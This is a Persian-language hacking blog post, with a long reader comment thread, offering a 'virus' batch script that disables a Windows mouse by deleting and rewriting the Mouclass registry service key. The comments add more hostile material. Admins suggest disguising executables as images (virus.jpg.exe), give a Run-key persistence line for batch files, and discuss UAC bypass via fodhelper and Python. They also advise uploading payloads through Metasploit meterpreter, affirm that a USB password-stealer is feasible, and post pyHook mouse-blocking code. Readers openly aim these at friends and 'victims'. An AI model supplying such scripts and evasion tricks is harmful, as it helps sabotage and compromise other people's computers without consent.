غیر فعال کردن موس :: V i R u s Ʒ²

V i R u s Ʒ²

هک و امنیت

V i R u s Ʒ²

هک و امنیت

Virus 32

💢 دوستانم بی دفاع و دشمنانم بی جواب نخواهند ماند 💢

-->
آخرین نظرات
  • ۲۲ مرداد ۰۲، ۰۰:۳۴ - Sami
    مرسی
  • ۱۴ مرداد ۰۲، ۱۴:۴۶ - farhad
    salam

ویروس غیر فعال کردن موس

کدهایی که در ادامه قرار میدم رو توی نوت پد وارد کرده وبا فرمت bat ذخیره کنید

rem Virus32.blog.ir
rem Disable Mouse
set key="HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass"
reg delete %key%
reg add %key% /v Start /t REG_DWORD /d 4
rem Virus32.blog.ir

این فایل رو تو سیستم خودتون هیچوقت اجرا نکنید

چون ریجستری رو دستکاری میکنه درست کردنش یکم دردسر داره :)

نظر (۵۵)

سلام داداش
خب حداقل بگو چطوری غیر فعالش کنیم دادیم به یه بد بختی بشه درستش کرد
Virus32 Virus 32 :
میتونیم در ریجستری به قسمتی که تعریف شده مراجعه کنیم
HKEY_LOCAL_MACHINE\system\CurrentControlSet\Services\Mouclass
و اطلاعات "Data" کلید start رو به عدد 3 تغییر بدیم
ویا میتونیم با همون کدهای بالا یه bat دیگه برای خنثی کردنش درست کنیم با این تغییر که در خط زیر
reg add %key% /v Start /t REG_DWORD /d 4
عدد چهار رو به سه تبدیل کنیم
داش قسمت ریجستری کجا میشه دقیق ؟
Virus32 Virus 32 :
توی Run بنویس Regedit و اینتر بزن
مرسی داش دمت گرم
راستی برنامه خوب سراغ نداری هر نوع باگی که سایت داشته باشه در بیاره واست ؟
Virus32 Virus 32 :
نه
سلام
بسیار بسیار ممنون از مطالب
ببخشید شما می دونید چه طور باید این ویروس هارو در قالب یک عکس درست کرد ؟
میشه آموزش اش رو هم بذارین !!! بسیار ممنون می شم
با تشکر
Virus32 Virus 32 :
سلام
خواهش میکنم
ویروسی در قالب عکس jpg ,gif ,png , bmp یا هر فرمت دیگه وجود نداره
ولی میتونیم ویروسی درست کنیم با آیکون عکس
یعنی شکل عکس داشته واسمش مثلا virus.jpg.exe باشه که افراد ساده خیلی زود فکر میکنن عکسه و ...
مرسی ممنون بسیار متشکر
داداش چجوری اپلود کنیم؟ و از جیمیل بفرستیم به گربانی
Virus32 Virus 32 :
دانلود اتوماتیک رو در پست های آینده قرار میدم
داداش میخوام توی چت روم این ویروسو اپلود کنم نمیشه میرم تو سایت اپلود اینو پیدا نمیکنه یعنی چیکار کنم
Virus32 Virus 32 :
توی چت روم نمیشه این کارو کرد
مگه اینکه چت روم خودت باشه
ایول باو.

توقالب عکس درست کردم دادم به دوستم خخخ
گربانی=قربانی
سلام دوست عزیزم
وبجالبی داری بم سربزنhttp://niazmandiyar.loxblog.com/
درج اگهی وتبلیغ رایگان
دادا یه سوال
میشه همه این کدایی که واس bat هستنو یه جا بزاریم؟؟؟
یا حتما باید جدا باشه؟
Virus32 Virus 32 :
اگه تداخل نداشته باشن میشه چند تا کد رو تو یه فایل قرار داد
داداش این bat دقیقا کجا قرار داره؟خخخخ نمیدونم خو
Virus32 Virus 32 :
وجود نداره شما باید ایجادش کنید
روی عبارت ذخیره کنید در پست کلیک کن متوجه میشی
سلام داداش میخاستم بپرسم. که اول ویروسای بت تو هر دستوری که بود. پروسه explorer.exeرو غیر فعال کنم
ویروس مشکلی پیدا نمیکنه
سلام میخاستم ببینم. اگع تو ویروسای بت. پروسه explorer.exe رو غیرفعال کنم مشکلی تو عملکردش پیش نمیاد
سلام داداش میخاستم بپرسم. که اول ویروسای بت تو هر دستوری که بود. پروسه explorer.exeرو غیر فعال کنم
ویروس مشکلی پیدا نمیکنه
Virus32 Virus 32 :
سلام عزیز
نه مشکلی پیدا نمیکنه
سلام میشه اون جا که نوشتی ویروس 32 جاش اسم خودم بزارم مشکلی نیست؟؟
Virus32 Virus 32 :
سلام
نه عزیز مشکلی نیست
سلام داداش ویروس خوبی عزیز؟
میگم سعی کن نوشتن اینجور ویروس ها که با نت پد مینویسنو به صورت کامل توضیح بدی
واقعا خوش حال میشم
راستی ممنون بابات وب خوبت
Virus32 Virus 32 :
سلام عزیز ممنون
توضیح دادم اینجا رو بخونید
چطوری تو نوت پد کدی بنویسیم که ویروس ار خودش تکثیر کنه و تو ریجستری
کپی شه برادر.
آنتی ویروس من حذفش می کنه!!
خخخخخخخخخخخخخخخ
:)))))))))))))))
سلام خسته نباشید ممنون از وب خوبتون
من داشتم توی نت چرخ میزدم که به یه ویروس نیو فولدر برخوردم
اگه میشه یکم راجبش توضیح بدیدو بگید چجوری میشه (ویروس نیو فولدر ساخت)
خیلی ممنون راستی چجوری میتونم رمز مطالب بگیرم
Virus32 Virus 32 :
سلام ممنون
حتما ساخت اون ویروس رو هم آموزش میدم
  • Virus32
  • یک هکر درست کار
  • من کلا از کد های شما راضی هستم ممنون
    سلام ویروس جان
    خیلی مطالبت باحاله
    فقط یه سوال وقتی ویروس رو اجرا میکنم ازت سوال میپرسه که ایا می خوای حذف شه یا نه
    چطوری میتونم کاری کنم که کارش رو بدون سوال کردن انجام بده Yes| رو بهش اضافه کردم سوال رو نپرسید ولی موس رو هم از کار ننداخت
    ممنون میشم اگه جواب بدی
    خیلییییییییی گلی
    سلام
    داداش من اینو اجرا کردم
    موسم از کار افتاد حالا حتی تغییرش دادم به ۳ هم دیگه درست نمیشه
    کمکم کن خواهشاا
    Virus32 Virus 32 :
    بعد اینکه تغییر دادی باید سیستم رو رستارت بدی
    حتی اونجا که گفتید ۴ رو به ۳ تغییر بدید دادم ولی باز برنگشت
    Virus32 Virus 32 :
    چرا اجراش کردی آخه؟
    شک داشتی مگه؟ :(
    گفتم که ریجستری دستکاری میشه
    حالا رس بده درست میشه
    سلام ممنون از مطالب خوبتون ببخشید یه سوال ویروسی ببندید که پیغام رسان باشه برای مثال متنو به طرف نشون بده بعد با کلیک کردن طرف متن بعد بیاد
    Virus32 Virus 32 :
    سلام عزیز
    با مطالب وب همراه باشید خودتون میتونید این ویروس رو به راحتی بنویسید
    قبلا توضیح داده شده
    سلام
    ممکنه کد ویروس از کار انداختن کیبورد را قرار بدی به صورتfile batch نه به صورت فایل های رجیستری که تو پست فایل های مخرب رجیستری قرار داری .
    چون هدف اصلی من دور زدن uac است و این فایل رجیستری که شما قرار دادید برای از کار انداختن کیبورد ، نمیتونه uac دور بزنه و این فایل بتی که اینجا هست فقط y با enter میخواد و اینم راحت میشه دور زد اگه میشه زودتر در اختیارم قرار دهید .
    با تشکر X
    راستی اگه وقت کردی روش stegosploit رو یه نگاهی کن اگه چیزی فهمیدی اموزششو بزار . که کد عکسو decode یا encode می کنیم بعد کد های java script رو باهاش bind می کنیم .
    بعد فایل jpg تبدیل به یک فایل اجرایی میشه بعد این یکم عجیب غریبه
    هک با عکس . که تو عکس payload رو میریزیم میدیم طرف بعد .......
    حالا اگه وقت کردی یه توضیح ابتدا به ما بده ما که شاگردیم شما اوستایی .
    Virus32 Virus 32 :
    سلام در این پست بصورت فایل reg براتون توضیح دادم
    غیر فعال کردن موس و کیبورد راهکار های زیادی داری
    1 - غیر فعال کردن از طریق ریجستری
    2 - کاهش دادن سطح دسترسی از طریق cmd
    3 - غیر فعال یا حذف کردن درایور های موس و کیبورد
    4 - جلوگیری از دسترسی داشتن به فایل های شناسایی سخت افزار
    5 - غیر فعال کردن تمام پورت های usb و ....
    در کل بیشتر این روش ها نیاز به سطح دسترسی ادمین رو داره
    و اینکه دور زدن uac کار هرکسی نیست. مگه اینکه با ترفند های خاص نیاز به سطح ادمین رو از بین ببریم
    داداش اگه ممکنه همون تکه اولو جواب بده قبل با تشکر ،X
    Virus32 Virus 32 :
    این پست رو بخون
    داداش منظورمو نگرفتی من میخوام با بچ فایل این کارو کنم کد های بچ برای از کار انداختن کیبورد رو بفرستین
    Virus32 MR_C0D3R ‌ :
    چند بار میگی :(
    داداش منظورمو نگرفتی من کدو برای از کار انداختن کیبورد در بچ فایل میخوام
    خلاصه : ویروس از کار انداختن کیبورد در قالب بچ فایل
    Virus32 MR_C0D3R ‌ :
    اونجوری باید با دسترسی ادمین اینکارو انجام بدی ، با فایل رجیستری که پیش بری به احتمال زیاد بهتر باشه ، خودشم چرا با برنامه نویسی پیش نمیری ؟ اونجوری دسترسی بیشتری داری و دستتم بازه , دقیقا میخوای چیکار کنی تو سیستم یارو ؟ چه زبانی بلدی ، اگه تونستم بهت کمک میکنم
    داداش وقتی فقط yes رو میخواد برای غیر فعال کردن کیبورد میشه با دستور
    کدمون | echo y
    دورش زد
    کدو مخفی کنید بی زحمت
    Virus32 MR_C0D3R ‌ :
    آره میشه ولی نمیدونم اونجا بگیره یا نه ، فقط میدونم وقتی | بزاریم دستور بعدیشم اجرا میشه که همونطور که شما گفتی ....
    سلام داداش
    خودت virsual box رو داری چون من درحال حاظر دسترسی به لپتاپم ندارم اگه میتونید رو یه ویندوز امتحان کنید
    زبان c CPP در حد کنسولی بلدم که فایده نداره واسه این کار
    خب فک کنم دستورات برای دور زدن uac یا مربوط به سخت افزار برمیگرده به لایبرری .windows تو CPP


    خب من هدف اصلی اصلیم اینه که uac رو با بت از کار بندازم با استفاده همین روشی که تو چت بالا گفتم ولی این یکم خواسته اضافی یعنی تقریبا غیر ممکنه
    خب بجاش میخوام‌ کیبورد رو از کار بندازم
    تو فایل های رجییتری شما باید دوبار روی yes بزنید
    بخاطر همین کد ویروس برای batch file میخوام
    Virus32 MR_C0D3R ‌ :
    سلام ، با فایل بچ فکر نکنم بتونی UAC رو دور بزنی ، به این سادگیا نیست (شایدم بشه ، چون قبلا یه ترفند وجود داشت که با ایجاد تغییرات توی رجیستری میتونستیم اینکارو بکنیم بخاطر همین شاید بشه با دستور Reg یه حرکتی زد)
    سی پلاس پلاس کار کردی ، کارت راحته که !!! یه برنامه بنویس برای غیرفعال کردن کیبورد و ... هر چی که دلت میخواد ، بعدا وقتی که با Metasploit دسترسی مترپرتر گرفتی ، با دستور upload ، فایلتو آپلود کن رو سیستم اون بنده خدایی که میخوای با احساساتش بازی کنی :) بعدا با دستور Shell وقتی خواستی دستور اجرای کد سی ام دی بدی ، دستور اجرا شدن اون ویروستو که با سی پلاس پلاس نوشتی بده
    ویندوز اون حاجیمون چیه ؟
    من بیشتر از زبان های دیگه پایتون کار کردم ، بخاطر همین این لینک رو چکش کن فک کنم بکارت بیاد ، چون آموزش دور زدن UAC رو با پایتون گفته ، اگه به مشکل برخوردی اونموقع بپرس ، خودشم برای دور زدن UAC ویندوز ده هستش
    در ضمن نگفتی میخوای کیبورد رو غیرفعالش کنی و بعدش چیکار کنی ؟
    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
    به نظرتون این کد اجراییه این کدو لطفا مخفی کنید دیگه
    **** * * **** *
    **
    *** *******************************************************************
    *** ****** *****
    *** *** ***** ** ***** ** ********* ** *
    Virus32 MR_C0D3R ‌ :
    حتی با دسترسی ادمین باز کردم ولی کار نکرد :|
    روش جالبیه برای دور زدن uac با fodhelper یعنی منظور اینه که fodhelper همیشه با بالاترین اجازست !
    حالا یه سوال حاجی چجوری script مون را اجرا کنیم در صفحه command prompt
    با administrator .
    روش های دیگه ام هست مثلا از اپدیت اعصاب خوردکن ویندوز حالا مطمعن نیستم حدس میزنم چون اونم فک کنم با اجازه ادمینه .
    حالا داداش اگه وقت کردی یه compiler واسه‌ پیتون واسه ویندوز ۱۰ لینکشو بزار
    با تشکر X
    Virus32 MR_C0D3R ‌ :
    تو گوگل بنویس Download python بعدا پایتون نسخه 2 رو از سایت خودش دانلود کن ، بعدا اسکریپت رو که اوکی کردی ، به این لینک برو و طبق آموزش اسکریپتتو کامپایل کن به فایل   Exe و ادامه ی مراحل ...
    ببخشید
    میدونید خودم میتونم python رو اجراش کنم با کالی یا.... term ولی من این فایلو به صورت exe میخوام‌پس یه. Compiler واسم بی زحمت اپلود کنید.
    Virus32 MR_C0D3R ‌ :
    از سایت خودش دانلود کن ، تو کامنت قبلی توضیح دادم ، یه چیز رو یکبار نمیگی که آدم بدونه تو کدوم کامنتت جوابشو بده :(
    من دسترسی meterpreter ندارم یا در حال حاظر نه با من چت میکنه نه تو lan منه به خاطر همین ای پیششو نمیشه در اورد پس میخوام با تماس فقط با فلش این کارو کنم نتم فک کنم نداره در حال حاظر پس میخوام یه فایل uac شو دور بزنه بعد کیبورد از کار بندازه
    اگه نت داش. هیچی یه payload میدادم ......
    Virus32 MR_C0D3R ‌ :
    اوکی
    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
    داداش من کد بت پیدا کردم ببین به درد میخوره uac دور میزنه و چجوری درست میشه
    لینک هارو ستاره کنید بی زحمت
    ***********************************************************************************
    اسلش بعد بچ هست
    ******************************************************************************************************

    تو اینترنت بزنید
    ***** **** *** ******* ******** میاره این متنم بی زحمت حذف کنید.

    Virus32 MR_C0D3R ‌ :
    خودت بررسیش کن من وقتشو ندارم
    بخش‌هایی از این نظر که با * مشخص شده، توسط مدیر سایت حذف شده است
    داداش یکیی از لینکا اشتباه بود لینک دوم.
    اینه لینک *******************************************************************************************/
    این متنم ستارش کنین بی زحمت

    Virus32 MR_C0D3R ‌ :
    همه چیز سانسوری شد که
    پس قطعی این فایلuac python رو دور میزنه دیگه شما امتحان کردی ؟
    شما امتحان کن من دست از سرت برمیدارم حلال کن اگه چرت و پرت زیاد گفتم
    Like داداش
    ممنون تا همین جا کمک کردی .
    Virus32 MR_C0D3R ‌ :
    نه عزیز من با سوال کردن کسی مشکلی ندارم فقط یه سوال رو چند بار میپرسی که آدم متوجه نمیشه تو کدوم باید جواب کامل بزاره
    نه تست نکردم فقط اگه عکس رو دیده باشی اخرش دسترسی ادمین میده که منم سر همون گفتم 
    راستیتش ویندوز ده ندارم برای دانلودشم ...
    داداش شما بگو من چجوری کد خودمو در این کد های پایتون که uac رو دور می زنه استفاده کنم این فقط صفحه cmd با اجازه ادمین باز میکنه اگه میشه بگین
    بعد من سی.....و میزنم و میرم
    Virus32 MR_C0D3R ‌ :
    اگه منظورت غیرفعال کردن کیبورد از طریق ریجستری هستش میتونی از کتابخونه ی winreg_ استفاده کنی که برای کار با ریجستری استفاده میشه 
    تو یوتیوب آموزشاش زیاده یه سرچ بزن در مورد یادگیری این کتابخونه
    یعنی منظورم اینه که به جای cmd فایل منو با administrator اجرا کنه با این کد پیتون
    Virus32 MR_C0D3R ‌ :
    همونطور که تو آموزشه توضیح داده بود با باز کردن برنامه ی پایتون ، دسترسی ادمین میگیری ، بقیه ی کاراتم با همین پایتون انجام بده دیگه ، فایل Cmd چی رو میگی دیگه !!!
    داداش کتابخانه ی winreg رو چجوری نصب کنم
    چون نمیشناسه
    Virus32 MR_C0D3R ‌ :
    به احتمال زیاد پایتون نسخه ی 3 رو دانلود کردی چون پایتون 2 اونو بصورت پیشفرض داره
    در کل برای نصب برو تو پوشه ای که پایتون نصب شده بعدا یه پوشه هست به نام Scripts وارد اون شو ، اونجا کلید شیفت رو بگیر و راست کلیک کن بعدا Open command window here رو بزن ، بعدش بنویس
    pip install _winreg
    منتظر بمون تا خودش دانلود و نصب بشه ... بعدا میتونی import کنی
    داداش این چه bypass uac هستش اجازه میخواد
    البته درجه uac من بالاترین درجه هست
    دمت گرم داداش uac درجه سه رو دور میزنه این عالیه اما درجه اخر رو نمیتونه
    ای شت
    راستی اون مشکلمو درست کردم لازم نیست جواب بدید.
    به نظرتون واسه منو میشه دور زد .
    Virus32 MR_C0D3R ‌ :
    برای شما کدومه ؟
    سلام روزتون بخیر!
    من یه ویروس میخوام برای یو اس بی که موقع وصل شدن کل اطلاعات پسورد های مرورگر ها وایلس و یا هرچیزی که پسورد داره توی یو اس بی ذخیره بشه
    اموزش های زیادی رو دیدم و انجام دادم اما یه سری مشکلات دارن
    اولا اینکه میخوام کاملا به صورت هیدن انجام بشه کار
    یعنی تو قسمت منیجر ظاهر نشه برنامه ها
    و پسورد ها تو فایل اکسل ذخیره بشن + اگه ممکن بود ایمیل بشه
    امکانش هست این کار؟
    Virus32 MR_C0D3R ‌ :
    سلام
    بله امکانش هست
    میشه ویروسی ساخت که به ایمیل طرف بره و جاسوسی کنه اگر هست بگو ؟
    Virus32 Terminator 32 :
    همچین چیزی که نه ولی میشه ویروسی ساخت که شما به سیستم طرف دسترسی پیدا کنی و از اونجا رمزش رو برداری و...
    داداش اون اخرش که ادرس سایتتو زدی برای چیه اگه نباشه چی میشه
    Virus32 MR_C0D3R ‌ :
    اون خط هایی که اولشون Rem اومده چیزی نیست و اگه نباشه مشکلی پیش نمیاد ...

    سلام من می خواستم از طریق فایل batch کیبورد رو از کار بندازم که به نظر خودم بهترین راهش از کار انداختن پورت usb ولی هر چقدر دنبالش گشتم نتونستم کدش رو پیدا کنم گفتم شاید شما بتونی کمکم کنی

    و در ضمن می خوام بتونم که دوباره به کارش بندازم و دائمی نباشه

    ممنون از سایتتون

    Virus32 Virus 32 :
    سلام عزیز
    داداش غیر فعال کردن پورت هارو یجا نوشته بودم ولی الان یادم نیس کدوم قسمت بود
    یه دور بزن بلکه یافتیش D:

    سلام داداش خیلی سایت خوبی داری عاشقشم برات آرزوی موفقیت میکنم من آرزومه مث شما بشم🤩

    Virus32 32 Attacker ‌ :
    سلام عزیز، لطف داری، ان شاء الله به درجات بالاتر نائل بشی :)

    یه کد میخوام که این ویروس رو وارد استارت آپ کنه، منظورم ریجستریه نه پوشه استارتآپ

    Virus32 محمدرضا نوربخش :
    مراحی که در این پست هست رو انجام بدید
    و یک مرحله دیگه هم هست اینکه باید به برنامه درسترسیAdministrator بدین
    برای همین شما باید روی پروژه اجراییتون کلیک کنید و گزینه Add رو بزنید و New Item رو بزنید و Application Manifest File رو انتخاب کنید
    و این متن رو پیدا کنید و با این کد تغییرش بدید
    </"requestedExecutionLevel level="asInvoker" uiAccess="false>

    </"requestedExecutionLevel level="requireAdministrator" uiAccess="false>
    امیدوارم بدردتون بخوره

    منظورم با کدهای بات بود، من سی شارپ اینا کار نکردم متسفانه

    Virus32 Attrib32 32 32 :
    سلام عزیز
    اینو بزار تو بچ فایلت
    REG ADD HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run /v %0 /d %0

    سلام

    میشه به من بگید از کجا میتوانم ویروس نویسی یاد بگیرم

    Virus32 32 Attacker ‌ :
    سلام یه زبان برنامه نویسی یاد بگیر، در راستای اهدافی که داری

    سلام

    میشه اون برنامه bluehackets رو بگی کجاست؟

    یکی اموزش هم برای هک دوربین گوشی بذار

    دمت گرم

    Virus32 32 Attacker ‌ :
    چی چی برنامه؟
    دسترسی به دوربین رو شاید بزارم بعدا، حالا یا با جاوا اسکریپت یا با لینوکس بالاخره میزارم ولی بستگی به خودتون داره :(

    سلام

    آره اتکر لطفا یه پست در مورد ذخیره عکس دوربین با جاوا اسکریپت بذار.

    یکی قبلا ساخته بودم با php ولی اون دکمه و این چیزا داشت. خودکار نبود که تا وب بالا اومد دسترسی رو بگیره و عکس آپلود شه....

    Virus32 32 Attacker ‌ :
    سلام، توو فکرش بودم قرار بود امشب منتشر کنم که قسمت نشد، به امید خدا فرداشب منتشر میکنم ولی با ابزار لینوکسه

    سلام اگر میشه این آموزش را دوباره به نحوی دیگه بدید چون اینو آنی ویروس حذف میکنه

    Virus32 Ax0o 32 :
    پیشرفته ترش حذف کردن درایور موس هست . بزودی احتمالا یه پست واسش بزارم

    میشه یه کدی بهم بدید که به طور موقت ، فقط موس رو قطع کنه . با زبان پایتون یا بچ اسکریپت .

     

     

    اونم موقت قطع کنه . یعنی دو تا فایل باشه . یکی اجرا شد موس رو قطع کنه اون یکی اجرا شد موس رو وصل کنه بدون ریستارت کردن سیستم و اینکه فقط موس رو قطع کنه نه کیبورد رو

    Virus32 Virus 32 :
    موس غیرفعال
    import pythoncom, pyHook 

    def uMad(event):
    return False

    hm = pyHook.HookManager()
    hm.MouseAll = uMad
    hm.HookMouse()
    pythoncom.PumpMessages()
    موس فعال
    import pythoncom, pyHook 

    def uMad(event):
    return True

    hm = pyHook.HookManager()
    hm.MouseAll = uMad
    hm.HookMouse()
    pythoncom.PumpMessages()
    #python

    ببخشید من دستم به دکمه Enter

    و فایل باز کرده و موسم کار نمی کند باید چه کار کرد 

     

    Virus32 Virus 32 :
    قبلش باید کدهای خنثی کننده اش رو میساختی تا بعد بتونی با کیبورد اجراش کنی
    ارسال نظر آزاد است، اما اگر قبلا در بیان ثبت نام کرده اید می توانید ابتدا وارد شوید.
    شما میتوانید از این تگهای html استفاده کنید:
    <b> یا <strong>، <em> یا <i>، <u>، <strike> یا <s>، <sup>، <sub>، <blockquote>، <code>، <pre>، <hr>، <br>، <p>، <a href="" title="">، <span style="">، <div align="">
    تجدید کد امنیتی